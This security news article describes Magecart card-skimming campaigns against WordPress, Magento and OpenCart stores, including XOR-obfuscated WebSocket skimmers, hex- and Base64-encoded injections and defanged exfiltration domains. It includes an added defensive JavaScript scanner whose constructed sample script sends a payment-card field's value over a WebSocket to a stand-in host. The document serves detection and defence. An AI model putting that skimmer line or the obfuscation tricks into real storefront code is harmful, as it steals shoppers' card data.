Magecart Strikes Again: Hackers Hit on New Year’s Eve

According to the latest report by Sucuri, cybercriminals have opened the holiday shopping season by launching attacks on online stores. The primary threat at this time is the theft of credit card data by skimming malware collectively known as Magecart. The season attracts attackers because the surge in online purchases lets them profit from selling stolen card data on the darknet.

One of the most common attack methods is the deployment of WebSocket skimmers; since August of this year, this threat has been detected on 432 sites. Using the WebSocket protocol, attackers covertly transfer user data from the shopper's browser to external servers, bypassing standard security measures.

The platforms most susceptible to such attacks include WordPress, Magento, and OpenCart. For instance, one variant of the attack combines the `String.fromCharCode` function with XOR encryption using the key 42, a nod to the famous book by Douglas Adams. Analysis reveals that the stolen data is transmitted to suspicious domains such as cdn[.]iconstaff[.]top.

Another prevalent method is hex-encoded skimmers, which are actively proliferating on sites running Magento and WooCommerce. Malicious code is inserted into databases and JavaScript files to create fake payment-data entry forms; the captured information is then sent to external servers such as cpeciadogfoods[.]com.

Base64-encoded injections also pose a threat, hidden within WordPress plugins and modules. The malicious code remains concealed inside the plugin and is triggered only on order pages. This method has gained traction because antivirus programs have difficulty detecting it.
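Static checks a store owner or analyst could run over a page's inline scripts to flag the four patterns described above (fromCharCode with XOR 42, hex-encoded blobs, Base64 fed to atob, and WebSocket connections to unexpected hosts). This is an added example, not code from the Sucuri report; the allowlisted host, the sample script and the `.invalid` exfiltration domain are constructed.

```javascript
// Assumed allowlist of hosts the store legitimately opens WebSockets to.
const ALLOWED_WS_HOSTS = new Set(["shop.example.com"]);

// Peel the String.fromCharCode + XOR layer used by the WebSocket skimmer:
// each stored value XORed with the key (42 in the reported sample) is a char code.
function decodeXorCharCodes(codes, key = 42) {
  return String.fromCharCode(...codes.map((c) => c ^ key));
}

// Return a list of heuristic findings for one script's source text.
function scanScript(src) {
  const findings = [];
  // 1. fromCharCode paired with "^ 42": the obfuscation seen on the WebSocket skimmer.
  if (/fromCharCode/i.test(src) && /\^\s*42\b/.test(src)) {
    findings.push("xor42-fromcharcode");
  }
  // 2. Long runs of \xNN escapes, typical of the hex-encoded skimmers.
  if (/(\\x[0-9a-f]{2}){16,}/i.test(src)) findings.push("hex-encoded-blob");
  // 3. A large Base64 literal passed straight to atob(), as in the plugin injections.
  if (/atob\s*\(\s*["'][A-Za-z0-9+/=]{40,}["']\s*\)/.test(src)) {
    findings.push("base64-atob-blob");
  }
  // 4. WebSocket connections whose host is not on the store's allowlist.
  for (const m of src.matchAll(/new\s+WebSocket\s*\(\s*["'](wss?:\/\/[^"'/]+)/g)) {
    const host = new URL(m[1]).hostname;
    if (!ALLOWED_WS_HOSTS.has(host)) findings.push(`websocket-exfil:${host}`);
  }
  return findings;
}

// Constructed sample script exhibiting all four patterns (not a real skimmer).
const SAMPLE_SCRIPT = `
  var h = String.fromCharCode(...[93,89,89,16,5,5].map(function(c){return c^42}));
  var ws = new WebSocket("wss://cdn.skimmer-example.invalid/ws");
  document.querySelector("#card").addEventListener("change", e => ws.send(e.target.value));
  var p = "${"\\x3c".repeat(16)}";
  eval(atob("${"QQ".repeat(25)}"));
`;

console.log(decodeXorCharCodes([93, 89, 89, 16, 5, 5])); // the XOR-42 layer hides "wss://"
console.log(scanScript(SAMPLE_SCRIPT));
```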

Smilodon, a threat targeting WordPress sites, has relied on malicious plugins for several years. This year the attackers refined their tactics by replacing standard plugins with versions containing random lines, which helps them evade protective measures.

To safeguard their online stores during the holiday season, owners are advised to conduct security audits. It is crucial to enable two-factor authentication for administrators, update all plugins and themes, apply the latest security patches for Magento, and verify the reliability of their hosting providers. Following these measures will help prevent data breaches and payment-system problems.
